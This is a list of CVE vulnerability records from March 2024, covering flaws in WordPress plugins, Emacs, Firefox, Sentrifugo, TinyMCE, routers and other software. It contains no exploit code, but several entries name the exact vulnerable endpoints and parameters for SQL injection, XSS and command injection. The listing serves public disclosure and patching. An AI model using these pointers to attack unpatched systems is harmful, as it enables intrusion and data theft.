CVE 2024 30270 Candidate ** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided. Assigned (20240326)
CVE 2024 30235 Candidate Missing Authorization vulnerability in Themeisle Multiple Page Generator Plugin – MPG.This issue affects Multiple Page Generator Plugin – MPG: from n/a through 3.4.0. MISC:https://patchstack.com/database/vulnerability/multiple-pages-generator-by-porthas/wordpress-multiple-page-generator-plugin-mpg-plugin-3-4-0-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/multiple-pages-generator-by-porthas/wordpress-multiple-page-generator-plugin-mpg-plugin-3-4-0-broken-access-control-vulnerability?_s_id=cve Assigned (20240326)
CVE 2024 30234 Candidate Missing Authorization vulnerability in Wholesale Team WholesaleX.This issue affects WholesaleX: from n/a through 1.3.1. MISC:https://patchstack.com/database/vulnerability/wholesalex/wordpress-wholesalex-plugin-1-3-1-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wholesalex/wordpress-wholesalex-plugin-1-3-1-broken-access-control-vulnerability?_s_id=cve Assigned (20240326)
CVE 2024 30233 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wholesale Team WholesaleX.This issue affects WholesaleX: from n/a through 1.3.1. MISC:https://patchstack.com/database/vulnerability/wholesalex/wordpress-wholesalex-plugin-1-3-1-sensitive-data-exposure-on-user-export-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wholesalex/wordpress-wholesalex-plugin-1-3-1-sensitive-data-exposure-on-user-export-vulnerability?_s_id=cve Assigned (20240326)
CVE 2024 30232 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Exclusive Addons Exclusive Addons Elementor allows Stored XSS.This issue affects Exclusive Addons Elementor: from n/a through 2.6.9. MISC:https://patchstack.com/database/vulnerability/exclusive-addons-for-elementor/wordpress-exclusive-addons-for-elementor-plugin-2-6-9-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/exclusive-addons-for-elementor/wordpress-exclusive-addons-for-elementor-plugin-2-6-9-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240326)
CVE 2024 30231 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Product Import Export for WooCommerce.This issue affects Product Import Export for WooCommerce: from n/a through 2.4.1. MISC:https://patchstack.com/database/vulnerability/product-import-export-for-woo/wordpress-product-import-export-for-woocommerce-plugin-2-4-1-arbitrary-file-upload-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/product-import-export-for-woo/wordpress-product-import-export-for-woocommerce-plugin-2-4-1-arbitrary-file-upload-vulnerability?_s_id=cve Assigned (20240326)
CVE 2024 30205 Candidate In Emacs before 29.3, Org mode considers contents of remote files to be trusted. This affects Org Mode before 9.6.23. MISC:https://git.savannah.gnu.org/cgit/emacs.git/commit/?h=emacs-29&id=2bc865ace050ff118db43f01457f95f95112b877 | MISC:https://git.savannah.gnu.org/cgit/emacs.git/tree/etc/NEWS?h=emacs-29 | MISC:https://git.savannah.gnu.org/cgit/emacs/org-mode.git/commit/?id=4255d5dcc0657915f90e4fba7e0a5514cced514d Assigned (20240325)
CVE 2024 30204 Candidate In Emacs before 29.3, LaTeX preview is enabled by default for e-mail attachments. MISC:https://git.savannah.gnu.org/cgit/emacs.git/commit/?h=emacs-29&id=6f9ea396f49cbe38c2173e0a72ba6af3e03b271c | MISC:https://git.savannah.gnu.org/cgit/emacs.git/tree/etc/NEWS?h=emacs-29 Assigned (20240325)
CVE 2024 30203 Candidate In Emacs before 29.3, Gnus treats inline MIME contents as trusted. MISC:https://git.savannah.gnu.org/cgit/emacs.git/commit/?h=emacs-29&id=937b9042ad7426acdcca33e3d931d8f495bdd804 | MISC:https://git.savannah.gnu.org/cgit/emacs.git/tree/etc/NEWS?h=emacs-29 Assigned (20240325)
CVE 2024 30202 Candidate In Emacs before 29.3, arbitrary Lisp code is evaluated as part of turning on Org mode. This affects Org Mode before 9.6.23. MISC:https://git.savannah.gnu.org/cgit/emacs.git/commit/?h=emacs-29&id=befa9fcaae29a6c9a283ba371c3c5234c7f644eb | MISC:https://git.savannah.gnu.org/cgit/emacs.git/tree/etc/NEWS?h=emacs-29 | MISC:https://git.savannah.gnu.org/cgit/emacs/org-mode.git/commit/?id=003ddacf1c8d869b1858181c29ea21b731a8d8d9 Assigned (20240325)
CVE 2024 30187 Candidate Anope before 2.0.15 does not prevent resetting the password of a suspended account. MISC:https://github.com/anope/anope/commit/2b7872139c40ea5b0ca96c1d6595b7d5f9fa60a5 | MISC:https://github.com/anope/anope/issues/351 Assigned (20240325)
CVE 2024 30161 Candidate In Qt before 6.5.6 and 6.6.x before 6.6.3, the wasm component may access QNetworkReply header data via a dangling pointer. MISC:https://codereview.qt-project.org/c/qt/qtbase/+/544314 Assigned (20240324)
CVE 2024 30156 Candidate Varnish Cache before 7.3.2 and 7.4.x before 7.4.3 (and before 6.0.13 LTS), and Varnish Enterprise 6 before 6.0.12r6, allows credits exhaustion for an HTTP/2 connection control flow window, aka a Broke Window Attack. MISC:https://varnish-cache.org/docs/7.5/whats-new/changes-7.5.html#security | MISC:https://varnish-cache.org/security/VSV00014.html Assigned (20240324)
CVE 2024 29944 Candidate An attacker was able to inject an event handler into a privileged object that would allow arbitrary JavaScript execution in the parent process. Note: This vulnerability affects Desktop Firefox only, it does not affect mobile versions of Firefox. This vulnerability affects Firefox < 124.0.1 and Firefox ESR < 115.9.1. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1886852 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1886852 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-15/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-15/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-16/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-16/ | MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html Assigned (20240321)
CVE 2024 29943 Candidate An attacker was able to perform an out-of-bounds read or write on a JavaScript object by fooling range-based bounds check elimination. This vulnerability affects Firefox < 124.0.1. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1886849 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1886849 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-15/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-15/ Assigned (20240321)
CVE 2024 29937 Candidate NFS in a BSD derived codebase, as used in OpenBSD through 7.4 and FreeBSD through 14.0-RELEASE, allows remote attackers to execute arbitrary code via a bug that is unrelated to memory corruption. MISC:https://news.ycombinator.com/item?id=39778203 | MISC:https://t2.fi/schedule/2024/ | MISC:https://www.signedness.org/t2.fi.2024/ | MISC:https://www.youtube.com/watch?v=i_JOkHaCdzk Assigned (20240321)
CVE 2024 29916 Candidate The dormakaba Saflok system before the November 2023 software update allows an attacker to unlock arbitrary doors at a property via forged keycards, if the attacker has obtained one active or expired keycard for the specific property, aka the "Unsaflok" issue. This occurs, in part, because the key derivation function relies only on a UID. This affects, for example, Saflok MT, and the Confidant, Quantum, RT, and Saffire series. MISC:https://news.ycombinator.com/item?id=39779291 | MISC:https://unsaflok.com | MISC:https://www.wired.com/story/saflok-hotel-lock-unsaflok-hack-technique/ Assigned (20240321)
CVE 2024 29883 Candidate CreateWiki is Miraheze's MediaWiki extension for requesting & creating wikis. Suppression of wiki requests does not work as intended, and always restricts visibility to those with the `(createwiki)` user right regardless of the settings one sets on a given wiki request. This may expose information to users who are not supposed to be able to access it. MISC:https://gist.githubusercontent.com/redbluegreenhat/0da1ebb7185b241ce1ac6ba1e8f0b98d/raw/44c4a229aacc8233808c767a79af9e4fd581ae68/T11993.patch | URL:https://gist.githubusercontent.com/redbluegreenhat/0da1ebb7185b241ce1ac6ba1e8f0b98d/raw/44c4a229aacc8233808c767a79af9e4fd581ae68/T11993.patch | MISC:https://github.com/miraheze/CreateWiki/security/advisories/GHSA-8wjf-mxjg-j8p9 | URL:https://github.com/miraheze/CreateWiki/security/advisories/GHSA-8wjf-mxjg-j8p9 | MISC:https://issue-tracker.miraheze.org/T11993 | URL:https://issue-tracker.miraheze.org/T11993 Assigned (20240321)
CVE 2024 29881 Candidate TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s content loading and content inserting code. A SVG image could be loaded though an `object` or `embed` element and that image could potentially contain a XSS payload. This vulnerability is fixed in 6.8.1 and 7.0.0. MISC:https://github.com/tinymce/tinymce/commit/bcdea2ad14e3c2cea40743fb48c63bba067ae6d1 | URL:https://github.com/tinymce/tinymce/commit/bcdea2ad14e3c2cea40743fb48c63bba067ae6d1 | MISC:https://github.com/tinymce/tinymce/security/advisories/GHSA-5359-pvf2-pw78 | URL:https://github.com/tinymce/tinymce/security/advisories/GHSA-5359-pvf2-pw78 | MISC:https://www.tiny.cloud/docs/tinymce/6/6.8.1-release-notes/#new-convert_unsafe_embeds-option-that-controls-whether-object-and-embed-elements-will-be-converted-to-more-restrictive-alternatives-namely-img-for-image-mime-types-video-for-video-mime-types-audio-audio-mime-types-or-iframe-for-other-or-unspecified-mime-types | URL:https://www.tiny.cloud/docs/tinymce/6/6.8.1-release-notes/#new-convert_unsafe_embeds-option-that-controls-whether-object-and-embed-elements-will-be-converted-to-more-restrictive-alternatives-namely-img-for-image-mime-types-video-for-video-mime-types-audio-audio-mime-types-or-iframe-for-other-or-unspecified-mime-types | MISC:https://www.tiny.cloud/docs/tinymce/7/7.0-release-notes/#convert_unsafe_embeds-editor-option-is-now-defaulted-to-true | URL:https://www.tiny.cloud/docs/tinymce/7/7.0-release-notes/#convert_unsafe_embeds-editor-option-is-now-defaulted-to-true Assigned (20240321)
CVE 2024 29880 Candidate In JetBrains TeamCity before 2023.11 users with access to the agent machine might obtain permissions of the user running the agent process MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240321)
CVE 2024 29879 Candidate Cross-Site Scripting (XSS) vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/index/getdepartments/format/html, 'business_id' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo Assigned (20240321)
CVE 2024 29878 Candidate Cross-Site Scripting (XSS) vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/sitepreference/add, 'description' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo Assigned (20240321)
CVE 2024 29877 Candidate Cross-Site Scripting (XSS) vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/expenses/expensecategories/edit, 'expense_category_name' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted URL to the victim and steal their session data. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo Assigned (20240321)
CVE 2024 29876 Candidate SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/reports/activitylogreport, 'sortby' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo Assigned (20240321)
CVE 2024 29875 Candidate SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/default/reports/exportactiveuserrpt, 'sort_name' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo Assigned (20240321)
CVE 2024 29874 Candidate SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/default/reports/activeuserrptpdf, 'sort_name' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo Assigned (20240321)
CVE 2024 29873 Candidate SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/reports/businessunits/format/html, 'bunitname' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo Assigned (20240321)
CVE 2024 29872 Candidate SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/empscreening/add, 'agencyids' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo Assigned (20240321)
CVE 2024 29871 Candidate SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/index/getdepartments/sentrifugo/index.php/index/updatecontactnumber, 'id' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo Assigned (20240321)
CVE 2024 29870 Candidate SQL injection vulnerability in Sentrifugo 3.2, through /sentrifugo/index.php/index/getdepartments/format/html, 'business_id' parameter./sentrifugo/index.php/index/getdepartments/format/html, 'business_id' parameter. The exploitation of this vulnerability could allow a remote user to send a specially crafted query to the server and extract all the data from it. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sentrifugo Assigned (20240321)
CVE 2024 29866 Candidate Datalust Seq before 2023.4.11151 and 2024 before 2024.1.11146 has Incorrect Access Control because a Project Owner or Organization Owner can escalate to System privileges. CONFIRM:https://github.com/datalust/seq-tickets/issues/2127 | MISC:https://datalust.co Assigned (20240321)
CVE 2024 29865 Candidate Logpoint before 7.1.0 allows Self-XSS on the LDAP authentication page via the username to the LDAP login form. MISC:https://servicedesk.logpoint.com/hc/en-us/articles/17710372214045-Self-XSS-on-LDAP-authentication Assigned (20240321)
CVE 2024 29864 Candidate Distrobox before 1.7.0.1 allows attackers to execute arbitrary code via command injection into exported executables. MISC:https://github.com/89luca89/distrobox/commit/82a69f0a234e73e447d0ea8c8b3443b84fd31944 | MISC:https://github.com/89luca89/distrobox/issues/1275 Assigned (20240321)
CVE 2024 29862 Candidate The Kerlink firewall in ChirpStack chirpstack-mqtt-forwarder before 4.2.1 and chirpstack-gateway-bridge before 4.0.11 wrongly accepts certain TCP packets when a connection is not in the ESTABLISHED state. MISC:https://github.com/chirpstack/chirpstack-gateway-bridge/commit/0c1e80c9fa9f5d093ff62903caedad86ec4640b6 | MISC:https://github.com/chirpstack/chirpstack-mqtt-forwarder/commit/4fa9e6eaaec8c3ca49ebfbf6317572671f17700f Assigned (20240321)
CVE 2024 29859 Candidate In MISP before 2.4.187, add_misp_export in app/Controller/EventsController.php does not properly check for a valid file upload. MISC:https://github.com/MISP/MISP/commit/238010bfd004680757b324cba0c6344f77a25399 Assigned (20240321)
CVE 2024 29858 Candidate In MISP before 2.4.187, __uploadLogo in app/Controller/OrganisationsController.php does not properly check for a valid logo upload. MISC:https://github.com/MISP/MISP/commit/6a2986be6aad6b37858b4869e238f517b295c111 Assigned (20240321)
CVE 2024 29732 Candidate A SQL Injection has been found on SCAN_VISIO eDocument Suite Web Viewer of Abast. This vulnerability allows an unauthenticated user to retrieve, update and delete all the information of database. This vulnerability was found on login page via "user" parameter. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-vulnerability-scanvisio-edocument-suite-web-viewer-abast | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-vulnerability-scanvisio-edocument-suite-web-viewer-abast Assigned (20240319)
CVE 2024 29684 Candidate DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/makehtml_homepage.php allowing a remote attacker to execute arbitrary code. MISC:https://github.com/iimiss/cms/blob/main/1.md Assigned (20240319)
CVE 2024 29666 Candidate Insecure Permissions vulnerability in Vehicle Monitoring platform system CMSV6 v.7.31.0.2 through v.7.32.0.3 allows a remote attacker to escalate privileges via the default password component. MISC:https://github.com/whgojp/cve-reports/wiki/There-is-a-weak-password-in-the-CMSV6-vehicle-monitoring-platform-system Assigned (20240319)
CVE 2024 29650 Candidate An issue in @thi.ng/paths v.5.1.62 and before allows a remote attacker to execute arbitrary code via the mutIn and mutInManyUnsafe components. MISC:https://gist.github.com/tariqhawis/1bc340ca5ea6ae115c9ab9665cfd5921 | MISC:https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b Assigned (20240319)
CVE 2024 29644 Candidate Cross Site Scripting vulnerability in dcat-admin v.2.1.3 and before allows a remote attacker to execute arbitrary code via a crafted script to the user login box. MISC:http://dcat-admin.com | MISC:https://github.com/jqhph/dcat-admin | MISC:https://www.yuque.com/yangtu-swjrh/oc6nqi/epcbz5y1grl4il1m Assigned (20240319)
CVE 2024 29515 Candidate File Upload vulnerability in lepton v.7.1.0 allows a remote authenticated attackers to execute arbitrary code via uploading a crafted PHP file to the save.php and config.php component. MISC:https://github.com/zzq66/cve7/ Assigned (20240319)
CVE 2024 29499 Candidate Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via /anchor/admin/users/delete/2. MISC:https://github.com/daddywolf/cms/blob/main/1.md Assigned (20240319)
CVE 2024 29474 Candidate OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the User Management module. MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V Assigned (20240319)
CVE 2024 29473 Candidate OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Role Management module. MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V Assigned (20240319)
CVE 2024 29472 Candidate OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Privilege Management module. MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V Assigned (20240319)
CVE 2024 29471 Candidate OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Notice Manage module. MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V Assigned (20240319)
CVE 2024 29470 Candidate OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the component {{rootpath}}/links. MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V Assigned (20240319)
CVE 2024 29469 Candidate A stored cross-site scripting (XSS) vulnerability in OneBlog v2.3.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Category List parameter under the Lab module. MISC:https://gitee.com/yadong.zhang/DBlog/issues/I98O8V Assigned (20240319)
CVE 2024 29442 Candidate An unauthorized access vulnerability has been discovered in ROS2 Humble Hawksbill versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could potentially allow a malicious user to gain unauthorized access to multiple ROS2 nodes remotely. Unauthorized access to these nodes could result in compromised system integrity, the execution of arbitrary commands, and disclosure of sensitive information. MISC:https://github.com/yashpatelphd/CVE-2024-29442 Assigned (20240319)
CVE 2024 29419 Candidate There is a Cross-site scripting (XSS) vulnerability in the Wireless settings under the Easy Setup Page of TOTOLINK X2000R before v1.0.0-B20231213.1013. MISC:https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_6_Wireless_settings/XSS.md | MISC:https://www.totolink.net/home/menu/detail/menu_listtpl/products/id/242/ids/33.html Assigned (20240319)
CVE 2024 29385 Candidate DIR-845L router <= v1.01KRb03 has an Unauthenticated remote code execution vulnerability in the cgibin binary via soapcgi_main function. MISC:https://github.com/songah119/Report/blob/main/CI-1.md | MISC:https://www.dlink.com/en/security-bulletin/ Assigned (20240319)
CVE 2024 29374 Candidate A Cross-Site Scripting (XSS) vulnerability exists in the way MOODLE 3.10.9 handles user input within the "GET /?lang=" URL parameter. MISC:https://gist.github.com/fir3storm/f9c7f3ec1a6496498517ed216d2640b2 Assigned (20240319)
CVE 2024 29366 Candidate A command injection vulnerability exists in the cgibin binary in DIR-845L router firmware <= v1.01KRb03. MISC:https://github.com/20Yiju/DLink/blob/master/DIR-845L/CI.md | MISC:https://www.dlink.com/en/security-bulletin/ Assigned (20240319)
CVE 2024 29338 Candidate Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via /anchor/admin/categories/delete/2. MISC:https://github.com/PWwwww123/cms/blob/main/1.md Assigned (20240319)
CVE 2024 29303 Candidate The delete admin users function of SourceCodester PHP Task Management System 1.0 is vulnerable to SQL Injection MISC:https://packetstormsecurity.com/files/177737/Task-Management-System-1.0-SQL-Injection.html | MISC:https://www.strongboxit.com/ Assigned (20240319)
CVE 2024 29302 Candidate SourceCodester PHP Task Management System 1.0 is vulnerable to SQL Injection via update-employee.php. MISC:https://packetstormsecurity.com/files/177737/Task-Management-System-1.0-SQL-Injection.html | MISC:https://www.strongboxit.com/ Assigned (20240319)
CVE 2024 29301 Candidate SourceCodester PHP Task Management System 1.0 is vulnerable to SQL Injection via update-admin.php?admin_id= MISC:https://packetstormsecurity.com/files/177737/Task-Management-System-1.0-SQL-Injection.html | MISC:https://www.strongboxit.com/ Assigned (20240319)
CVE 2024 29275 Candidate SQL injection vulnerability in SeaCMS version 12.9, allows remote unauthenticated attackers to execute arbitrary code and obtain sensitive information via the id parameter in class.php. MISC:https://github.com/seacms-net/CMS/issues/15 Assigned (20240319)
CVE 2024 29273 Candidate There is Stored Cross-Site Scripting (XSS) in dzzoffice 2.02.1 SC UTF8 in uploadfile to index.php, with the XSS payload in an SVG document. MISC:https://github.com/zyx0814/dzzoffice/issues/244 Assigned (20240319)
CVE 2024 29272 Candidate Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php. MISC:https://github.com/givanz/VvvebJs/commit/c6422cfd4d835c2fa6d512645e30015f24538ef0 | MISC:https://github.com/givanz/VvvebJs/issues/343 Assigned (20240319)
CVE 2024 29271 Candidate Reflected Cross-Site Scripting (XSS) vulnerability in VvvebJs before version 1.7.7, allows remote attackers to execute arbitrary code and obtain sensitive information via the action parameter in save.php. MISC:https://github.com/givanz/VvvebJs/commit/c0c0545b44b23acc288ef907fb498ce15b9b576e | MISC:https://github.com/givanz/VvvebJs/issues/342 Assigned (20240319)
CVE 2024 29244 Candidate Shenzhen Libituo Technology Co., Ltd LBT-T300-mini v1.2.9 was discovered to contain a buffer overflow via the pin_code_3g parameter at /apply.cgi. MISC:https://github.com/AdamRitz/lbtvul/blob/main/t300mini-2.md Assigned (20240319)
CVE 2024 29243 Candidate Shenzhen Libituo Technology Co., Ltd LBT-T300-mini v1.2.9 was discovered to contain a buffer overflow via the vpn_client_ip parameter at /apply.cgi. MISC:https://github.com/AdamRitz/lbtvul/blob/main/t300mini-2.md Assigned (20240319)
CVE 2024 29216 Candidate Exposed IOCTL with insufficient access control issue exists in cg6kwin2k.sys prior to 2.1.7.0. By sending a specific IOCTL request, a user without the administrator privilege may perform I/O to arbitrary hardware port or physical address, resulting in erasing or altering the firmware. MISC:https://jvn.jp/en/vu/JVNVU90671953/ | URL:https://jvn.jp/en/vu/JVNVU90671953/ | MISC:https://sangomakb.atlassian.net/wiki/spaces/DVC/pages/45351279/Natural+Access+Software+Download | URL:https://sangomakb.atlassian.net/wiki/spaces/DVC/pages/45351279/Natural+Access+Software+Download Assigned (20240319)
CVE 2024 29203 Candidate TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s content insertion code. This allowed `iframe` elements containing malicious code to execute when inserted into the editor. These `iframe` elements are restricted in their permissions by same-origin browser protections, but could still trigger operations such as downloading of malicious assets. This vulnerability is fixed in 6.8.1. MISC:https://github.com/tinymce/tinymce/commit/bcdea2ad14e3c2cea40743fb48c63bba067ae6d1 | URL:https://github.com/tinymce/tinymce/commit/bcdea2ad14e3c2cea40743fb48c63bba067ae6d1 | MISC:https://github.com/tinymce/tinymce/security/advisories/GHSA-438c-3975-5x3f | URL:https://github.com/tinymce/tinymce/security/advisories/GHSA-438c-3975-5x3f | MISC:https://www.tiny.cloud/docs/tinymce/6/6.8.1-release-notes/#new-convert_unsafe_embeds-option-that-controls-whether-object-and-embed-elements-will-be-converted-to-more-restrictive-alternatives-namely-img-for-image-mime-types-video-for-video-mime-types-audio-audio-mime-types-or-iframe-for-other-or-unspecified-mime-types | URL:https://www.tiny.cloud/docs/tinymce/6/6.8.1-release-notes/#new-convert_unsafe_embeds-option-that-controls-whether-object-and-embed-elements-will-be-converted-to-more-restrictive-alternatives-namely-img-for-image-mime-types-video-for-video-mime-types-audio-audio-mime-types-or-iframe-for-other-or-unspecified-mime-types | MISC:https://www.tiny.cloud/docs/tinymce/7/7.0-release-notes/#sandbox_iframes-editor-option-is-now-defaulted-to-true | URL:https://www.tiny.cloud/docs/tinymce/7/7.0-release-notes/#sandbox_iframes-editor-option-is-now-defaulted-to-true Assigned (20240318)
CVE 2024 29199 Candidate Nautobot is a Network Source of Truth and Network Automation Platform. A number of Nautobot URL endpoints were found to be improperly accessible to unauthenticated (anonymous) users. These endpoints will not disclose any Nautobot data to an unauthenticated user unless the Nautobot configuration variable EXEMPT_VIEW_PERMISSIONS is changed from its default value (an empty list) to permit access to specific data by unauthenticated users. This vulnerability is fixed in 1.6.16 and 2.1.9. MISC:https://github.com/nautobot/nautobot/commit/2fd95c365f8477b26e06d60b999ddd36882d5750 | URL:https://github.com/nautobot/nautobot/commit/2fd95c365f8477b26e06d60b999ddd36882d5750 | MISC:https://github.com/nautobot/nautobot/commit/dd623e6c3307f48b6357fcc91925bcad5192abfb | URL:https://github.com/nautobot/nautobot/commit/dd623e6c3307f48b6357fcc91925bcad5192abfb | MISC:https://github.com/nautobot/nautobot/pull/5464 | URL:https://github.com/nautobot/nautobot/pull/5464 | MISC:https://github.com/nautobot/nautobot/pull/5465 | URL:https://github.com/nautobot/nautobot/pull/5465 | MISC:https://github.com/nautobot/nautobot/releases/tag/v1.6.16 | URL:https://github.com/nautobot/nautobot/releases/tag/v1.6.16 | MISC:https://github.com/nautobot/nautobot/releases/tag/v2.1.9 | URL:https://github.com/nautobot/nautobot/releases/tag/v2.1.9 | MISC:https://github.com/nautobot/nautobot/security/advisories/GHSA-m732-wvh2-7cq4 | URL:https://github.com/nautobot/nautobot/security/advisories/GHSA-m732-wvh2-7cq4 Assigned (20240318)
CVE 2024 29196 Candidate phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. There is a Path Traversal vulnerability in Attachments that allows attackers with admin rights to upload malicious files to other locations of the web root. This vulnerability is fixed in 3.2.6. MISC:https://github.com/thorsten/phpMyFAQ/commit/7ae2559f079cd5fc9948b6fdfb87581f93840f62 | URL:https://github.com/thorsten/phpMyFAQ/commit/7ae2559f079cd5fc9948b6fdfb87581f93840f62 | MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-mmh6-5cpf-2c72 | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-mmh6-5cpf-2c72 Assigned (20240318)
CVE 2024 29195 Candidate The azure-c-shared-utility is a C library for AMQP/MQTT communication to Azure Cloud Services. This library may be used by the Azure IoT C SDK for communication between IoT Hub and IoT Hub devices. An attacker can cause an integer wraparound or under-allocation or heap buffer overflow due to vulnerabilities in parameter checking mechanism, by exploiting the buffer length parameter in Azure C SDK, which may lead to remote code execution. Requirements for RCE are 1. Compromised Azure account allowing malformed payloads to be sent to the device via IoT Hub service, 2. By passing IoT hub service max message payload limit of 128KB, and 3. Ability to overwrite code space with remote code. Fixed in commit https://github.com/Azure/azure-c-shared-utility/commit/1129147c38ac02ad974c4c701a1e01b2141b9fe2. MISC:https://github.com/Azure/azure-c-shared-utility/commit/1129147c38ac02ad974c4c701a1e01b2141b9fe2 | URL:https://github.com/Azure/azure-c-shared-utility/commit/1129147c38ac02ad974c4c701a1e01b2141b9fe2 | MISC:https://github.com/Azure/azure-c-shared-utility/security/advisories/GHSA-m8wp-hc7w-x4xg | URL:https://github.com/Azure/azure-c-shared-utility/security/advisories/GHSA-m8wp-hc7w-x4xg Assigned (20240318)
